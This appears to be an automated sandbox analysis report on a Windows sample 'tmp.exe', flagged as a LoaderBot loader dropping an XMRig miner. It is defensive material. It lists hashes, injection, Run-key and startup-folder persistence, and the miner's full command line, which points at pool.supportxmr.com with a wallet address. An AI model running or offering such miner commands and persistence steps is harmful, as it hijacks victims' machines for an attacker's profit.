Analysis
-
max time kernel
68s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
25-05-2023 21:08
Static task
static1
Behavioral task
behavioral1
Sample
tmp.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
tmp.exe
Resource
win10v2004-20230220-en
General
-
Target
tmp.exe
-
Size
2.7MB
-
MD5
e7bf9f0c2c1977ddd8e139c13c27be0d
-
SHA1
e91aff3d9a8c7cef0e9543350864971e4ad93f82
-
SHA256
a615a2c647bce3b67f43c818a7fd972a653a605efce83b7eb6f38fb374ec8eba
-
SHA512
d9961824b178944aec2411c1bb29a5ef4b487ce0c251fe381e2841c6abe00f29ecf895ab1baf93e49442af07a14acdcf9d882519d39beb5c4d4902db2db2560f
-
SSDEEP
49152:552sxwTr/VsoJteujcnqNwelN/z52r7zj9n0cqv/3SYd:55jxa3JteujcncNNQzj9hqXCY
Malware Config
Signatures
-
LoaderBot executable 1 IoCs
resource yara_rule behavioral2/memory/3348-141-0x0000000000400000-0x00000000007FE000-memory.dmp loaderbot -
XMRig Miner payload 14 IoCs
resource yara_rule behavioral2/memory/3916-159-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4348-162-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4348-165-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4348-166-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4348-167-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4348-170-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4348-173-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4348-174-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4348-175-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4348-176-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4348-177-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4348-178-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/2964-183-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/2964-184-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation tmp.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url tmp.exe -
Executes dropped EXE 2 IoCs
pid Process 3916 Driver.exe 4348 Driver.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\tmp.exe" tmp.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2076 set thread context of 3348 2076 tmp.exe 90 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 2748 3916 WerFault.exe 91 4068 4348 WerFault.exe 96 -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe 3348 tmp.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 672 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 3348 tmp.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 3348 tmp.exe Token: SeLockMemoryPrivilege 3916 Driver.exe Token: SeLockMemoryPrivilege 3916 Driver.exe Token: SeLockMemoryPrivilege 4348 Driver.exe Token: SeLockMemoryPrivilege 4348 Driver.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2076 wrote to memory of 3348 2076 tmp.exe 90 PID 2076 wrote to memory of 3348 2076 tmp.exe 90 PID 2076 wrote to memory of 3348 2076 tmp.exe 90 PID 2076 wrote to memory of 3348 2076 tmp.exe 90 PID 2076 wrote to memory of 3348 2076 tmp.exe 90 PID 2076 wrote to memory of 3348 2076 tmp.exe 90 PID 2076 wrote to memory of 3348 2076 tmp.exe 90 PID 2076 wrote to memory of 3348 2076 tmp.exe 90 PID 3348 wrote to memory of 3916 3348 tmp.exe 91 PID 3348 wrote to memory of 3916 3348 tmp.exe 91 PID 3348 wrote to memory of 4348 3348 tmp.exe 96 PID 3348 wrote to memory of 4348 3348 tmp.exe 96
Processes
-
C:\Users\Admin\AppData\Local\Temp\tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2076 -
C:\Users\Admin\AppData\Local\Temp\tmp.exe"{path}"2⤵
- Checks computer location settings
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3348 -
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 427X8guX5JRRGk4v7gRcwK85MwpjCAN7djGqBAbCETdqc5biVY27pePT3Ctx43QMLAdKAaRDF4KW4HiozmdQ7EHrNczdnfM -p x -k -v=0 --donate-level=1 -t 23⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3916 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3916 -s 7684⤵
- Program crash
PID:2748
-
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 427X8guX5JRRGk4v7gRcwK85MwpjCAN7djGqBAbCETdqc5biVY27pePT3Ctx43QMLAdKAaRDF4KW4HiozmdQ7EHrNczdnfM -p x -k -v=0 --donate-level=1 -t 23⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4348 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4348 -s 8524⤵
- Program crash
PID:4068
-
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 427X8guX5JRRGk4v7gRcwK85MwpjCAN7djGqBAbCETdqc5biVY27pePT3Ctx43QMLAdKAaRDF4KW4HiozmdQ7EHrNczdnfM -p x -k -v=0 --donate-level=1 -t 23⤵PID:2964
-
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 480 -p 3916 -ip 39161⤵PID:5084
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 540 -p 4348 -ip 43481⤵PID:2232
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD517573558c4e714f606f997e5157afaac
SHA113e16e9415ceef429aaf124139671ebeca09ed23
SHA256c18db6aecad2436da4a63ff26af4e3a337cca48f01c21b8db494fe5ccc60e553
SHA512f4edf13f05a0d142e4dd42802098c8c44988ee8869621a62c2b565a77c9a95857f636583ff8d6d9baa366603d98b9bfbf1fc75bc6f9f8f83c80cb1215b2941cc
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322